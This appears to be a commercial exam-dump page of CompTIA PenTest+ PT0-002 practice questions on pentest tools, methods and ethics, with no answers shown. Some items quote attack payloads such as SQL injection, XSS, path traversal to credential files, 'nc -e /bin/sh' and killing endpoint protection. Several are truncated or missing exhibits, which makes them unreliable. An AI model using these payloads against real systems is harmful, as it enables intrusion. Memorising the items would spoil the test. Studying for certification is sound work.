Labour Day Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > CompTIA > PenTest+ > PT0-002

PT0-002 CompTIA PenTest+ Certification Exam Question and Answers

Question # 4

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAIT FOR DELAY '0:0:15'

Which of the following actions would best mitigate this type ol attack?

A.

Encrypting passwords

B.

Parameterizing queries

C.

Encoding output

D.

Sanitizing HTML

Full Access
Question # 5

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

A.

Multiplexing

B.

Bluejacking

C.

Zero-day attack

D.

Smurf attack

Full Access
Question # 6

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

A.

ROE

B.

SLA

C.

NDA

D.

SOW

Full Access
Question # 7

A penetration tester is reviewing the logs of a proxy server and discovers the following URLs:

https://test.comptia.com/profile.php?userid=1546

https://test.cpmptia.com/profile.php?userid=5482

https://test.comptia.com/profile.php?userid=3618

Which of the following types of vulnerabilities should be remediated?

A.

Insecure direct object reference

B.

Improper error handling

C.

Race condition

D.

Weak or default configurations

Full Access
Question # 8

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"

When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Full Access
Question # 9

A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?

A.

Contact the high-profile celebrities.

B.

Delete the high-profile accounts.

C.

Immediately contact the client.

D.

Record the findings in the penetration test report.

Full Access
Question # 10

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open.

Full Access
Question # 11

During a security assessment, a penetration tester decides to write the following Python script: import requests

x= ['OPTIONS', 'TRACE', 'TEST'l

for y in x;

z - requests.request(y, 'http://server.net ')

print(y, z.status_code, z.reason)

Which of the following is the penetration tester trying to accomplish? (Select two).

A.

Web server denial of service

B.

HTTP methods availability

C.

'Web application firewall detection

D.

'Web server fingerprinting

E.

Web server error handling

F.

Web server banner grabbing

Full Access
Question # 12

Which of the following tools would be best to use to conceal data in various kinds of image files?

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Full Access
Question # 13

A penetration tester is reviewing the security of a web application running in an laaS compute instance. Which of the following payloads should the tester send to get the running process credentials?

A.

file=http://192.168. 1. 78?+document.cookie

B.

file =.. / .. / .. /proc/self/environ

C.

file='%20or%2054365=54365 ;--

Full Access
Question # 14

A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode

Which of the following is the most likely reason the penetration tester ran this command?

A.

To search for passwords in the service directory

B.

To list scheduled tasks that may be exploitable

C.

To register a service to run as System

D.

To find services that have unquoted service paths

Full Access
Question # 15

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:

Which of the following is the most likely explanation for the output?

A.

The tester does not have credentials to access the server-status page.

B.

The admin directory cannot be fuzzed because it is forbidden.

C.

The admin, test, and db directories redirect to the log-in page.

D.

The robots.txt file has six entries in it.

Full Access
Question # 16

For an engagement, a penetration tester is required to use only local operating system tools for file transfer. Which of the following options should the penetration tester consider?

A.

Netcat

B.

WinSCP

C.

Filezilla

D.

Netstat

Full Access
Question # 17

A penetration tester developed the following script to be used during an engagement:

#!/usr/bin/python

import socket, sys

ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

if len(sys.argv) > 1:

target = socket.gethostbyname (sys. argv [0])

else:

print ("Few arguments.")

print ("Syntax: python {} ". format (sys. argv [0]))

sys.exit ()

try:

for port in ports:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

s.settimeout (2)

result = s.connect_ex ((target, port) )

if result == 0:

print ("Port {} is opened". format (port) )

except KeyboardInterrupt:

print ("\nExiting ... ")

sys.exit ()

However, when the penetration tester ran the script, the tester received the following message:

socket.gaierror: [Errno -2] Name or service not known

Which of the following changes should the penetration tester implement to fix the script?

A.

From:

target = socket.gethostbyname (sys. argv [0])

To:

target = socket.gethostbyname (sys.argv[1])

B.

From:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

To:

s = socket.socket (socket.AF_INET, socket. SOCK_DGRAM)

C.

From:

import socket, sys

To:

import socket

import sys

D.

From:

result = s.connect_ex ((target, port) )

To:

result = s.connect ( (target, port) )

Full Access
Question # 18

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?

A.

Wireshark

B.

Netcat

C.

Nmap

D.

Ettercap

Full Access
Question # 19

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

A.

Secondary

B.

Emergency

C.

Technical

D.

Primary

Full Access
Question # 20

An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

A.

Client acceptance

B.

Data destruction process

C.

Attestation of findings

D.

Lessons learned

Full Access
Question # 21

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A.

Implementation of patching and change control programs

B.

Revision of client scripts used to perform system updates

C.

Remedial training for the client's systems administrators

D.

Refrainment from patching systems until quality assurance approves

Full Access
Question # 22

A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

A.

..e

cho "The correct password is $p" && break)

ho "The correct password is $p" I| break

B.

.e

cho "The correct password is $p" && break)

o "The correct password is $p" I break

C.

e

cho "The correct password is Sp" && break)

echo "The correct password is $p" && break)

D.

.

{ echo "The correct password is $p" && break )

With

E.

( echo "The correct password is $p" && break )

Full Access
Question # 23

Which of the following documents should be consulted if a client has an issue accepting a penetration test report that was provided?

A.

Rules of engagement

B.

Signed authorization letter

C.

Statement of work

D.

Non-disclosure agreement

Full Access
Question # 24

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?

A.

Relay the traffic to the real file server and steal documents as they pass through.

B.

Host a malicious file to compromise the workstation.

C.

Reply to the broadcasts with a fake IP address to deny access to the real file server.

D.

Respond to the requests with the tester's IP address and steal authentication credentials.

Full Access
Question # 25

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

A.

Create a class for requests.

B.

Write a function for requests.

C.

Import the requests library.

D.

Use the cURL OS command.

Full Access
Question # 26

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Full Access
Question # 27

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

A.

Weak authentication schemes

B.

Credentials stored in strings

C.

Buffer overflows

D.

Non-optimized resource management

Full Access
Question # 28

During enumeration, a red team discovered that an external web server was frequented by employees. After compromising the server, which of the following attacks would best support ------------company systems?

A.

Aside-channel attack

B.

A command injection attack

C.

A watering-hole attack

D.

A cross-site scripting attack

Full Access
Question # 29

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

A.

OWASP ZAP

B.

Nmap

C.

Nessus

D.

BeEF

E.

Hydra

F.

Burp Suite

Full Access
Question # 30

Which of the following documents describes activities that are prohibited during a scheduled penetration test?

A.

MSA

B.

NDA

C.

ROE

D.

SLA

Full Access
Question # 31

During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.

Which of the following vulnerabilities was the attacker trying to exploit?

A.

..Session hijacking

B.

..URL manipulation

C.

..SQL injection

D.

..Insecure direct object reference

Full Access
Question # 32

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT?

A.

Deny that the vulnerability existed

B.

Investigate the penetration tester.

C.

Accept that the client was right.

D.

Fire the penetration tester.

Full Access
Question # 33

Given the following code:

Which of the following data structures is systems?

A.

A tuple

B.

A tree

C.

An array

D.

A dictionary

Full Access
Question # 34

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

A.

SOW.

B.

SLA.

C.

ROE.

D.

NDA

Full Access
Question # 35

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?

A.

Use Nmap's -T2 switch to run a slower scan and with less resources.

B.

Run the scans using multiple machines.

C.

Run the scans only during lunch hours.

D.

Use Nmap's -host-timeout switch to skip unresponsive targets.

Full Access
Question # 36

Which of the following describes how a penetration tester could prioritize findings in a report?

A.

Business mission and goals

B.

Cyberassets

C.

Network infrastructure

D.

Cyberthreats

Full Access
Question # 37

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A.

Executive summary

B.

Remediation

C.

Methodology

D.

Metrics and measures

Full Access
Question # 38

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

A.

/var/log/messages

B.

/var/log/last_user

C.

/var/log/user_log

D.

/var/log/lastlog

Full Access
Question # 39

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A.

Gain access to the target host and implant malware specially crafted for this purpose.

B.

Exploit the local DNS server and add/update the zone records with a spoofed A record.

C.

Use the Scapy utility to overwrite name resolution fields in the DNS query response.

D.

Proxy HTTP connections from the target host to that of the spoofed host.

Full Access
Question # 40

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A.

Badge cloning

B.

Watering-hole attack

C.

Impersonation

D.

Spear phishing

Full Access
Question # 41

A penetration tester was able to compromise a server and escalate privileges. Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.)

A.

Remove the logs from the server.

B.

Restore the server backup.

C.

Disable the running services.

D.

Remove any tools or scripts that were installed.

E.

Delete any created credentials.

F.

Reboot the target server.

Full Access
Question # 42

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

A.

Changing to Wi-Fi equipment that supports strong encryption

B.

Using directional antennae

C.

Using WEP encryption

D.

Disabling Wi-Fi

Full Access
Question # 43

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

A.

WHOIS domain lookup

B.

Job listing and recruitment ads

C.

SSL certificate information

D.

Public data breach dumps

Full Access
Question # 44

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

A.

A list

B.

A tree

C.

A dictionary

D.

An array

Full Access
Question # 45

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

A.

security compliance regulations or laws may be violated.

B.

testing can make detecting actual APT more challenging.

C.

testing adds to the workload of defensive cyber- and threat-hunting teams.

D.

business and network operations may be impacted.

Full Access
Question # 46

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

A.

window.location.= 'https://evilcorp.com '

B.

crossDomain: true

C.

geturlparameter ('username')

D.

redirectUrl = 'https://example.com '

Full Access
Question # 47

A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

A.

Send an SMS with a spoofed service number including a link to download a malicious application.

B.

Exploit a vulnerability in the MDM and create a new account and device profile.

C.

Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.

D.

Infest a website that is often used by employees with malware targeted toward x86 architectures.

Full Access
Question # 48

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A.

Vulnerability scanning

B.

Network segmentation

C.

System hardening

D.

Intrusion detection

Full Access
Question # 49

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A.

The SSL certificates were invalid.

B.

The tester IP was blocked.

C.

The scanner crashed the system.

D.

The web page was not found.

Full Access
Question # 50

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A.

A birthday attack on 64-bit ciphers (Sweet32)

B.

An attack that breaks RC4 encryption

C.

An attack on a session ticket extension (Ticketbleed)

D.

A Heartbleed attack

Full Access
Question # 51

A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

Which of the following changes should the tester apply to make the script work as intended?

A.

Change line 2 to $ip= ג€10.192.168.254ג€;

B.

Remove lines 3, 5, and 6.

C.

Remove line 6.

D.

Move all the lines below line 7 to the top of the script.

Full Access
Question # 52

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A.

Network segmentation

B.

Key rotation

C.

Encrypted passwords

D.

Patch management

Full Access
Question # 53

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

A.

DirBuster

B.

CeWL

C.

w3af

D.

Patator

Full Access
Question # 54

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A.

Mask

B.

Rainbow

C.

Dictionary

D.

Password spraying

Full Access
Question # 55

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

A.

Alert the target company of the discovered information.

B.

Verify the discovered information is correct with the manufacturer.

C.

Scan the equipment and verify the findings.

D.

Return to the dumpster for more information.

Full Access
Question # 56

A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

A.

Maximizing the likelihood of finding vulnerabilities

B.

Reprioritizing the goals/objectives

C.

Eliminating the potential for false positives

D.

Reducing the risk to the client environment

Full Access
Question # 57

During the assessment of a client's cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the provided on-premises credentials. Which of the following best describes why the tester was able to gain access?

A.

Federation misconfiguration of the container

B.

Key mismanagement between the environments

C.

laaS failure at the provider

D.

Container listed in the public domain

Full Access
Question # 58

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

A.

Check the scoping document to determine if exfiltration is within scope.

B.

Stop the penetration test.

C.

Escalate the issue.

D.

Include the discovery and interaction in the daily report.

Full Access
Question # 59

Penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and )ut.. they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?

A.

Conditional

B.

Library

C.

Dictionary

D.

Sub application

Full Access
Question # 60

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A.

Set up a captive portal with embedded malicious code.

B.

Capture handshakes from wireless clients to crack.

C.

Span deauthentication packets to the wireless clients.

D.

Set up another access point and perform an evil twin attack.

Full Access
Question # 61

A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

A.

CentOS

B.

Arch Linux

C.

Windows Server

D.

Ubuntu

Full Access
Question # 62

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

A.

Add a web shell to the root of the website.

B.

Upgrade the reverse shell to a true TTY terminal.

C.

Add a new user with ID 0 to the /etc/passwd file.

D.

Change the password of the root user and revert after the test.

Full Access
Question # 63

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A.

A handheld RF spectrum analyzer

B.

A mask and personal protective equipment

C.

Caution tape for marking off insecure areas

D.

A dedicated point of contact at the client

E.

The paperwork documenting the engagement

F.

Knowledge of the building's normal business hours

Full Access
Question # 64

An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

A.

Encrypted passwords

B.

System-hardening techniques

C.

Multifactor authentication

D.

Network segmentation

Full Access
Question # 65

The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

A.

Line 8

B.

Line 13

C.

Line 19

D.

Line 20

Full Access
Question # 66

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

A.

Remote file inclusion

B.

Cross-site scripting

C.

SQL injection

D.

Insecure direct object references

Full Access
Question # 67

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Full Access
Question # 68

Which of the following tools would be the best to use to intercept an HTTP response at an API, change its content, and forward it back to the origin mobile device?

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Full Access
Question # 69

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

A.

Dumpster diving

B.

Phishing

C.

Badge cloning

D.

Tailgating

Full Access
Question # 70

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

A.

OWASP Top 10

B.

MITRE ATT&CK

C.

Cyber Kill Chain

D.

Well-Architected Framework

Full Access
Question # 71

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Full Access
Question # 72

A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?

A.

The penetration tester misconfigured the network scanner.

B.

The network scanning tooling is not functioning properly.

C.

The IP ranges changed ownership.

D.

The network scanning activity is being blocked by a firewall.

Full Access
Question # 73

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Full Access
Question # 74

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

A.

Clarify the statement of work.

B.

Obtain an asset inventory from the client.

C.

Interview all stakeholders.

D.

Identify all third parties involved.

Full Access
Question # 75

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Full Access
Question # 76

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:

python -c 'import pty; pty.spawn("/bin/bash")'

Which of the following actions Is the penetration tester performing?

A.

Privilege escalation

B.

Upgrading the shell

C.

Writing a script for persistence

D.

Building a bind shell

Full Access
Question # 77

A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

A.

Immunity Debugger

B.

OllyDbg

C.

GDB

D.

Drozer

Full Access
Question # 78

As part of an active reconnaissance, a penetration tester intercepts and analyzes network traffic, including API requests and responses. Which of the following can be gained by capturing and examining the API traffic?

A.

Assessing the performance of the network's API communication

B.

Identifying the token/authentication detail

C.

Enumerating all users of the application

D.

Extracting confidential user data from the intercepted API responses

Full Access
Question # 79

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:

comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org.

3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.

Which of the following potential issues can the penetration tester identify based on this output?

A.

At least one of the records is out of scope.

B.

There is a duplicate MX record.

C.

The NS record is not within the appropriate domain.

D.

The SOA records outside the comptia.org domain.

Full Access
Question # 80

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

A.

Data flooding

B.

Session riding

C.

Cybersquatting

D.

Side channel

Full Access
Question # 81

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

A.

VRFY and EXPN

B.

VRFY and TURN

C.

EXPN and TURN

D.

RCPT TO and VRFY

Full Access
Question # 82

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Full Access
Question # 83

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

A.

Send deauthentication frames to the stations.

B.

Perform jamming on all 2.4GHz and 5GHz channels.

C.

Set the malicious AP to broadcast within dynamic frequency selection channels.

D.

Modify the malicious AP configuration to not use a pre-shared key.

Full Access
Question # 84

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A.

S/MIME

B.

FTPS

C.

DNSSEC

D.

AS2

Full Access
Question # 85

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

A.

OpenVAS

B.

Drozer

C.

Burp Suite

D.

OWASP ZAP

Full Access
Question # 86

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

A.

Key reinstallation

B.

Deauthentication

C.

Evil twin

D.

Replay

Full Access
Question # 87

After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host. Which of the following commands would be

best for the consultant to use to terminate the protection software and its child processes?

A.

taskkill /PID /T /F

B.

taskkill /PID /IM /F

C.

taskkill /PID /S /U

D.

taskkill /PID /F /P

Full Access
Question # 88

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

A.

Create a one-shot system service to establish a reverse shell.

B.

Obtain /etc/shadow and brute force the root password.

C.

Run the nc -e /bin/sh <...> command.

D.

Move laterally to create a user account on LDAP

Full Access
Question # 89

A penetration tester runs the following command:

nmap -p- -A 10.0.1.10

Given the execution of this command, which of the following quantities of ports will Nmap scan?

A.

1,000

B.

1,024

C.

10,000

D.

65,535

Full Access
Question # 90

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

A.

B.

../../../../../../../../../../etc/passwd

C.

/var/www/html/index.php;whoami

D.

1 UNION SELECT 1, DATABASE(),3--

Full Access
Question # 91

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

A.

Web archive

B.

GitHub

C.

File metadata

D.

Underground forums

Full Access
Question # 92

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

A.

As backup in case the original documents are lost

B.

To guide them through the building entrances

C.

To validate the billing information with the client

D.

As proof in case they are discovered

Full Access
Question # 93

Which of the following tools provides Python classes for interacting with network protocols?

A.

Responder

B.

Impacket

C.

Empire

D.

PowerSploit

Full Access
Question # 94

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

A.

The penetration tester conducts a retest.

B.

The penetration tester deletes all scripts from the client machines.

C.

The client applies patches to the systems.

D.

The client clears system logs generated during the test.

Full Access
Question # 95

Which of the following is the most common vulnerability associated with loT devices that are directly connected to the internet?

A.

Unsupported operating systems

B.

Susceptibility to DDoS attacks

C.

Inability to network

D.

The existence of default passwords

Full Access
Question # 96

A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.

Windows

B.

Apple

C.

Linux

D.

Android

Full Access
Question # 97

A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

A.

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

B.

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the

engagement

C.

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

D.

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

E.

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

F.

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

Full Access
Question # 98

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

A.

Create a custom password dictionary as preparation for password spray testing.

B.

Recommend using a password manage/vault instead of text files to store passwords securely.

C.

Recommend configuring password complexity rules in all the systems and applications.

D.

Document the unprotected file repository as a finding in the penetration-testing report.

Full Access
Question # 99

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform

phishing in a later stage of the assessment?

A.

Test for RFC-defined protocol conformance.

B.

Attempt to brute force authentication to the service.

C.

Perform a reverse DNS query and match to the service banner.

D.

Check for an open relay configuration.

Full Access
Question # 100

A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

A.

Wireshark

B.

Aircrack-ng

C.

Kismet

D.

Wifite

Full Access
Question # 101

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

A.

Pick a lock.

B.

Disable the cameras remotely.

C.

Impersonate a package delivery worker.

D.

Send a phishing email.

Full Access
Question # 102

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A.

Buffer overflows

B.

Cross-site scripting

C.

Race-condition attacks

D.

Zero-day attacks

E.

Injection flaws

F.

Ransomware attacks

Full Access
Question # 103

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client’s requirements?

A.

“cisco-ios” “admin+1234”

B.

“cisco-ios” “no-password”

C.

“cisco-ios” “default-passwords”

D.

“cisco-ios” “last-modified”

Full Access
Question # 104

A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

